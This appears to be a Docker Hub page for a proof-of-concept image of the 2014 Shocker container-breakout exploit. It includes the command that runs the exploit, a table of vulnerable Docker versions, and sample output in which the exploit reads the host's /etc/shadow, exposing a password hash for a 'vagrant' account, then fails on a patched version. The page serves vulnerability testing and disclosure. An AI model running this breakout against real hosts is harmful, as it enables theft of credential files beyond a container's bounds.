Public | Automated Build

Last pushed: 2 years ago
Short Description
Short description is empty for this repo.
Full Description

Shocker / Docker Breakout PoC

This is a Docker Image used to test container breakout exploit first posted here:
http://stealth.openwall.net/xSports/shocker.c

The container will attempt to find and print contents of the Docker host's /etc/shadow.

Usage

To run the PoC exploit use:

docker run gabrtv/shocker

Building

To modify source and rebuild, use:

docker build -t gabrtv/shocker .

Vulnerability Matrix

Simple table outlining vulnerability to this particular exploit. PRs welcome!

Docker Version Docker Host OS Vulnerable?
0.8.1 Ubuntu 12.04 LTS Yes
0.10.0 Ubuntu 12.04 LTS Yes
0.11.0 Ubuntu 12.04 LTS Yes
0.11.1 CoreOS v324.2.0 Yes
0.11.1 Ubuntu 12.04 LTS Yes
0.12.0 Ubuntu 12.04 LTS No
1.0 Boot2Docker No
1.0 CoreOS v343.0.0+ No
1.0 Ubuntu 12.04 LTS No

Examples

Confirmed vulnerable: Docker 0.11.1 running Ubuntu 12.04 LTS

root@precise64:~# docker version
Client version: 0.11.1
Client API version: 1.11
Go version (client): go1.2.1
Git commit (client): fb99f99
Server version: 0.11.1
Server API version: 1.11
Git commit (server): fb99f99
Go version (server): go1.2.1
Last stable version: 1.0.0, please update docker

root@precise64:~# docker info
Containers: 6
Images: 10
Storage Driver: aufs
 Root Dir: /var/lib/docker/aufs
 Dirs: 22
Execution Driver: native-0.2
Kernel Version: 3.8.0-42-generic
WARNING: No swap limit support

root@precise64:~# docker run gabrtv/shocker
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]
[*] Resolving 'etc/shadow'
[*] Found vmlinuz
[*] Found vagrant
[*] Found lib64
[*] Found usr
[*] Found ...
[*] Found etc
[+] Match: etc ino=3932161
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'shadow'
[*] Found timezone
[*] Found cron.hourly
...
[*] Found skel
[*] Found shadow
[+] Match: shadow ino=3935729
[*] Brute forcing remaining 32bit. This can take a while...
[*] (shadow) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0xf1, 0x0d, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0xf1, 0x0d, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
root:!:15597:0:99999:7:::
daemon:*:15597:0:99999:7:::
bin:*:15597:0:99999:7:::
sys:*:15597:0:99999:7:::
sync:*:15597:0:99999:7:::
games:*:15597:0:99999:7:::
man:*:15597:0:99999:7:::
lp:*:15597:0:99999:7:::
mail:*:15597:0:99999:7:::
news:*:15597:0:99999:7:::
uucp:*:15597:0:99999:7:::
proxy:*:15597:0:99999:7:::
www-data:*:15597:0:99999:7:::
backup:*:15597:0:99999:7:::
list:*:15597:0:99999:7:::
irc:*:15597:0:99999:7:::
gnats:*:15597:0:99999:7:::
nobody:*:15597:0:99999:7:::
libuuid:!:15597:0:99999:7:::
syslog:*:15597:0:99999:7:::
messagebus:*:15597:0:99999:7:::
ntp:*:15597:0:99999:7:::
sshd:*:15597:0:99999:7:::
vagrant:$6$aqzOtgCM$OxgoMP4JoqMJ1U1F3MZPo2iBefDRnRCXSfgIM36E5cfMNcE7GcNtH1P/tTC2QY3sX3BxxJ7r/9ciScIVTa55l0:15597:0:99999:7:::
vboxadd:!:15597::::::
statd:*:15597:0:99999:7:::

Exploit fails on Docker 0.12:

root@precise64:~# docker version
Client version: 0.12.0
Client API version: 1.12
Go version (client): go1.2.1
Git commit (client): 14680bf
Server version: 0.12.0
Server API version: 1.12
Go version (server): go1.2.1
Git commit (server): 14680bf

root@precise64:~# docker info
Containers: 5
Images: 10
Storage Driver: aufs
 Root Dir: /var/lib/docker/aufs
 Dirs: 20
Execution Driver: native-0.2
Kernel Version: 3.8.0-42-generic
WARNING: No swap limit support

root@precise64:~# docker run gabrtv/shocker
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]
[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted

License

BSD

Docker Pull Command
Owner
gabrtv
Source Repository

Comments (0)